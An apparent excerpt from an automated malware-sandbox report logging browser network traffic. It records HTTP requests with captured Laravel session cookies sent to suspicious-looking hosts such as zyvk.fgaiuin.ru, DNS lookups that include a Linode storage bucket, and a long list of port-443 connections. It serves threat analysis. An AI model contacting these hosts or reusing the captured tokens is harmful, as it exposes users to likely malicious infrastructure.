laravel_session=eyJpdiI6IjFCbmVTWWdWWnRxb3ZGSGx6aDNOWHc9PSIsInZhbHVlIjoiR2F4YzRsaDVBcExtZndWYVhiTzQ5TWhjM3g3UVp4SHhFNWx2dURWdWJ5RGFKWEZwZEpNSzRMYlpxNitaU3oyZjJSaldzV2xST1oraEdyREIwREVUNVljOHg0VmtGUDdYYlJ1VDlBM1JlTmZrRlNXKy8rbHdHeThoaS9JR0lQTnEiLCJtYWMiOiJhZmQ4N2MzYTRlOThjZTYyNjE2MGMyNjdhMzNmODQ3YzViNDQ4OWI1OTY5NWU5MjUzMWMxZjcyMjljZWQzYzc0IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /opTZQRdFZXI9raOJwdpsyGfsdyKJ2TK5PdTfLOBJSR9iV5IPstBSa36UESJdcDFjfpdeY2Hne2mI0PwYCVcd240 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijladk9CTDRrbVQvcWdvcGdEWkdZRlE9PSIsInZhbHVlIjoiV0kxM3hBV2RSUkVHcVlLOHl0SnRoUVg1c0VtdXQ3WVhlUTc2dXJicVZ5N3F4ZkhNNDIxU3d3SDF4U0dtRGdvamtwSS9FV1dwdlBzQjB4UWNvNUw0WThFUXpxMGUzOUZmSTA3RjNqTStVc1I4TFVNUlBIaFBvOG10U0NIQlJaTE4iLCJtYWMiOiJmZTUyZmMzNTA4M2Y1MjhjNTRjYjY5NzQ0Y2NkNTU2YmZkY2ZiOWI3ZWUyNTYyMTQ1MDY5YzhlNmNhNTc1M2JlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFCbmVTWWdWWnRxb3ZGSGx6aDNOWHc9PSIsInZhbHVlIjoiR2F4YzRsaDVBcExtZndWYVhiTzQ5TWhjM3g3UVp4SHhFNWx2dURWdWJ5RGFKWEZwZEpNSzRMYlpxNitaU3oyZjJSaldzV2xST1oraEdyREIwREVUNVljOHg0VmtGUDdYYlJ1VDlBM1JlTmZrRlNXKy8rbHdHeThoaS9JR0lQTnEiLCJtYWMiOiJhZmQ4N2MzYTRlOThjZTYyNjE2MGMyNjdhMzNmODQ3YzViNDQ4OWI1OTY5NWU5MjUzMWMxZjcyMjljZWQzYzc0IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /stIrN6fgetKZ2pEHJbr5ECSIda45Rwn0FB9toxb2HlSxdtTGNoGturGef251 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijladk9CTDRrbVQvcWdvcGdEWkdZRlE9PSIsInZhbHVlIjoiV0kxM3hBV2RSUkVHcVlLOHl0SnRoUVg1c0VtdXQ3WVhlUTc2dXJicVZ5N3F4ZkhNNDIxU3d3SDF4U0dtRGdvamtwSS9FV1dwdlBzQjB4UWNvNUw0WThFUXpxMGUzOUZmSTA3RjNqTStVc1I4TFVNUlBIaFBvOG10U0NIQlJaTE4iLCJtYWMiOiJmZTUyZmMzNTA4M2Y1MjhjNTRjYjY5NzQ0Y2NkNTU2YmZkY2ZiOWI3ZWUyNTYyMTQ1MDY5YzhlNmNhNTc1M2JlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFCbmVTWWdWWnRxb3ZGSGx6aDNOWHc9PSIsInZhbHVlIjoiR2F4YzRsaDVBcExtZndWYVhiTzQ5TWhjM3g3UVp4SHhFNWx2dURWdWJ5RGFKWEZwZEpNSzRMYlpxNitaU3oyZjJSaldzV2xST1oraEdyREIwREVUNVljOHg0VmtGUDdYYlJ1VDlBM1JlTmZrRlNXKy8rbHdHeThoaS9JR0lQTnEiLCJtYWMiOiJhZmQ4N2MzYTRlOThjZTYyNjE2MGMyNjdhMzNmODQ3YzViNDQ4OWI1OTY5NWU5MjUzMWMxZjcyMjljZWQzYzc0IiwidGFnIjoiIn0%3D
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: mixpanel.com
                Source: global trafficDNS traffic detected: DNS query: cdn.mxpnl.com
                Source: global trafficDNS traffic detected: DNS query: o81318.ingest.us.sentry.io
                Source: global trafficDNS traffic detected: DNS query: api.honeycomb.io
                Source: global trafficDNS traffic detected: DNS query: api.sprig.com
                Source: global trafficDNS traffic detected: DNS query: automotorespascualito.com
                Source: global trafficDNS traffic detected: DNS query: prudn87837498798487434.us-lax-1.linodeobjects.com
                Source: global trafficDNS traffic detected: DNS query: zyvk.fgaiuin.ru
                Source: global trafficDNS traffic detected: DNS query: code.jquery.com
                Source: global trafficDNS traffic detected: DNS query: kwzh.kdyukk.ru
                Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: github.com
                Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
                Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
                Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
                Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
                Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
                Source: unknownHTTP traffic detected: POST /tproxy/track/?verbose=1&ip=1&_=1743011000751 HTTP/1.1Host: mixpanel.comConnection: keep-aliveContent-Length: 1070sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0Accept: */*Origin: https://mixpanel.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfiAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp__origin_referrer=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 26 Mar 2025 17:43:22 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 17:43:27 GMTContent-Type: text/plain; charset=utf-8Content-Length: 19Connection: closeAccess-Control-Allow-Origin: *Vary: Accept-EncodingX-Content-Type-Options: nosniff
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 17:43:34 GMTContent-Type: text/plain; charset=utf-8Content-Length: 19Connection: closeAccess-Control-Allow-Origin: *Vary: Accept-EncodingX-Content-Type-Options: nosniff
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 17:43:35 GMTContent-Type: text/plain; charset=utf-8Content-Length: 19Connection: closeAccess-Control-Allow-Origin: *Vary: Accept-EncodingX-Content-Type-Options: nosniff
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 17:43:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t6UqRkMeK61ISwVKwvr8L6JNWuzqbNv02ejPfwuSeQKvA97dYojPaw%2B%2BhDjAw%2Bq%2FPs%2FvI%2B5aeNavhrtZRNJA97LuLf6jufud%2FF%2FhMseC9HzMmxGa2Sb3PpztWsYY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=1138&min_rtt=1112&rtt_var=331&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2244&delivery_rate=2503025&cwnd=251&unsent_bytes=0&cid=f75cbc021c7e8f8f&ts=131&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 9268738bdcfa6e53-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=86888&min_rtt=85649&rtt_var=19358&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1909&delivery_rate=35675&cwnd=252&unsent_bytes=0&cid=bea0dbeb4723cde5&ts=2078&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 17:43:40 GMTContent-Type: text/plain; charset=utf-8Content-Length: 19Connection: closeAccess-Control-Allow-Origin: *Vary: Accept-EncodingX-Content-Type-Options: nosniff
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 17:43:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MJHk9MefmkxsFfpaYS3Gn2LT1B6Y%2BFIADqHSoodRTnJ7eUEGd5lzBEN2woZqIW2FItFRM85hAuBcVHje96HVcIqVBxhwS%2FjgYHkFep4bFkzwgF48VYcWhA6FI%2Bio"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=4789&min_rtt=4725&rtt_var=1818&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2048&delivery_rate=612910&cwnd=251&unsent_bytes=0&cid=0cfa1de0d5e37f1e&ts=127&x=0"Server: cloudflareCF-RAY: 926873c3184075e1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=87002&min_rtt=85818&rtt_var=19314&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1714&delivery_rate=35585&cwnd=252&unsent_bytes=0&cid=0e66faa10b0a0127&ts=497&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 17:43:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ykM4X9OMidURVMnNeN8DGF%2F12WM9mUDhIjPz%2Fj22lhYiZAUIuhbRY3ONn8xV7nfCUtyVEsCCfurthGKYrGItaNZgoPGwksBrQFUKiIjd6pswYma0x6xrapW7J1jB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=1019&min_rtt=1004&rtt_var=312&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2052&delivery_rate=2604316&cwnd=250&unsent_bytes=0&cid=8f688eea7d91ad6b&ts=87&x=0"Server: cloudflareCF-RAY: 926873cebf489187-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=85297&min_rtt=85289&rtt_var=18001&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1717&delivery_rate=35831&cwnd=252&unsent_bytes=0&cid=70a247ad087c3a06&ts=441&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 17:43:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yjEVssNsRgaqzpeFcr7KCiKk1Lqy3B9zQEixbxsuMVp0EFjMjScQ1qvoJ862i8YSaG7qKJTlviIziRu6TTn3magIWcMexBvxcq28BTKjpJ1te0neXhM5XblRC1SM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=4541&min_rtt=4534&rtt_var=1283&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2070&delivery_rate=635087&cwnd=251&unsent_bytes=0&cid=da1708d4470a0401&ts=129&x=0"Server: cloudflareCF-RAY: 926873dfbd96432b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=86014&min_rtt=85614&rtt_var=18473&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1735&delivery_rate=35700&cwnd=252&unsent_bytes=0&cid=3c9bbd87476e9304&ts=1536&x=0"
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
                Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
                Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
                Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
                Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
                Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
                Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
